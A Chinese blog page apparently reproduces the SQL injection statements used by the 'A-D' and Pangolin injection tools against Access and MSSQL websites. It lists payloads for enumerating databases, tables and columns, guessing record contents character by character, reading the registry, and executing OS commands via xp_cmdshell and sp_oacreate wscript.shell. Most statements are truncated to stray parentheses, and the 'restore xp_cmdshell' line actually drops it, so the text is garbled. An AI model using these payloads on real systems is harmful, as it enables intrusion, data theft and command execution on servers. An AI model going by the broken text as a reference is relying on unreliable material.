啊D工具语句 适合Access和Mssql注入
啊D注入工具中使用的SQL注入语句
爆user
)) )= | *****
?Id))
: ?Id
: Id
检查SA权限:))))
爆当前库: )) --
检查是否为mssql数据库:and exists (select * from sysobjects)
(*%20from%20sysobjects)
判断表名:
panolin: ?Id
admin也可以编码:%6E
啊D:?Id([admin])
爆列名:
啊D:([admin])
panolin:
判断记录数:
()
判断admin表中有几个记录 如: cstr() 转换成字符型就是"" 那么他的长度就是2,所以这里
阿D: ()) 判断在0-9999之间,这句是判断在0-8之间
(,))))
记录数的第一位 也就是0
(,))))
记录数的第二位 也就是1 所以
猜字段长度:
Article.asp?Id((()) 第一条记录的字段长度
第一条
Article.asp?Id((()) 第二条记录的字段
第二条
阿D:
Article.asp?Id(( 判断第一条记录的字段长度0-32之间
第二条
Article.asp?Id(( 判断第二条记录的字段长度0-32之间
两个top 保留一个top ,改另外一个成top x 就可以猜第x个字段长度 或改最后一个top (pangolin就是改最后一个top来爆第N杀记录的长度)
猜字段内容:
(,)))(()) 第一条记录、第一位的asc码
(,)))(()) 第19位的asc码
阿D:
(,))( 第一条记录、第7位的asc码在30~80之间
第一条
第二条
(,))( 第二条记录、第7位的asc码在30~80之间
猜中文:
(,)))) 第一个列的内容是不是》
(,)))) 第二个列是不是》
检查数据库中有多少个库:)) ))) ) )
爆第一个库: )) ) --
爆第N个库: )) ) --
爆有多少个列名:)))) id )))))))))
爆列名: )) id )))))))) --
读注册表:
))--
) ',@result);--
)) ))) --
执行CMD
),ID ,)) insert D99_CMD exec master.dbo.xp_cmdshell 'dir c:\'--
)))) --
执行WSCRIPT:
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [cmd.exe /c dir c:\] --
恢复XP_CMDSHELL
;exec master..sp_dropextendedproc 'xp_cmdshell'--
啊D工具语句 适合Access和Mssql注入的更多相关文章
- ACCESS与MSSQL比较:SQL语句关于时间格式使用的注意点
ACCESS与MSSQL比较:SQL语句关于时间字符串的使用:ACCESS数据库使用 # 来控制时间格式字符串:mssql数据库使用单引号 ' 来控制时间格式字符串.例: ACCESS版本:UPDAT ...
- Web渗透测试(sql注入 access,mssql,mysql,oracle,)
Access数据库注入: access数据库由微软发布的关系型数据库(小型的),安全性差. access数据库后缀名位*.mdb, asp中连接字符串应用-- "Driver={micros ...
- MSSQL注入常用SQL语句整理
很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入,一下是本人收集的一些mssql的sql语句. 手工MSSQL注入常用SQL语句 and exists (select * from ...
- Oracle客户端工具出现“Cannot access NLS data files or invalid environment specified”错误的解决办法
Oracle客户端工具出现"Cannot access NLS data files or invalid environment specified"错误的解决办法 方法一:参考 ...
- (转载)用SQL语句创建Access表
<来源网址:http://www.delphifans.com/infoview/Article_220.html>用SQL语句创建Access表 很久以前弄的,用了一天的时间,没有什么技 ...
- 渗透测试学习 九、 MSsql注入上
MSsql注入漏洞详解 (Asp.Aspx站,常见于棋牌网站.考试网站.大学网站.政府网站.游戏网站.OA办公系统) 大纲:msSQL数据库调用分析 msSQL注入原理 msSQL注入另类玩法 msS ...
- (非原)SQL注入专题--整理帖 && like 语句拼sql 如何防止注入攻击。
原地址:blog.csdn.net/lvjin110/article/details/28697695 like 语句拼sql 如何防止注入攻击?http://bbs.csdn.net/topics/ ...
- MSSQL注入:显错注入及反弹注入
前言: MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路. MSSQL的显错注入操作: 以联合查询为例: 猜 ...
- Access数据库及注入方法
目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数 ...
随机推荐
- (六)play之yabe项目【验证码】
(六)play之yabe项目[验证码] 博客分类: 框架@play framework 添加验证码功能 在Application.java中添加一个action:captcha() /** * 添 ...
- 【转】Android 语言切换过程分析
最近在看一个bug,系统切换语言后,本来退到后台的音乐,会在通知栏上显示通知.为了解决这个bug,我学习了下android的语言切换流程,也参考了大量其他人的资料.(主要参考了http://blog. ...
- IOS真机测试(用证书进行真机测试)
真机测试需要准备 1.证书 2.Iphone或者Ipad 3.到developer.apple.com注册开发者账号(不用money的) ------------------------------- ...
- Xcode的内存清理
1.删除Xcode中多余的证书provisioning profile 手动删除: 打开finder,然后在最上面的前往中前往下方的路径,就可以看到你xcode运行到现在使用过的证书provision ...
- 关于Tomcat启动时报The APR based Apache Tomcat Native library which allows optimal performanc e in production environments was not found on the java.library.path
错误信息如下 八月 01, 2016 10:11:15 上午 org.apache.catalina.core.AprLifecycleListener initINFO: The APR based ...
- android中实现view可以滑动的六种方法
在android开发中,经常会遇到一个view需要它能够支持滑动的需求.今天就来总结实现其滑动的六种方法.其实每一种方法的 思路都是一样的,即:监听手势触摸的坐标来实现view坐标的变化,从而实现vi ...
- MongoDB学习笔记——聚合操作之group,distinct,count
单独的聚合命令(group,distinct,count) 单独聚合命令 比aggregate性能低,比Map-reduce灵活度低:但是可以节省几行javascript代码,后面那句话我自己加的,哈 ...
- 完全卸载VS2005或VS2008的步骤
手动卸载步骤: Visual Studio Express Editions 进入控制面板,运行添加或删除程序 卸载 "MSDN Library for Visual Studio 200 ...
- python基本数据结构-集合-方法
- 一·创建Linux服务器(基于阿里云)
本系统是基于阿里云服务器,购买请前往https://www.aliyun.com/?spm=5176.8142029.388261.1.taXish ,由于经济能力的限制,本人购买的是最低配置如下 其 ...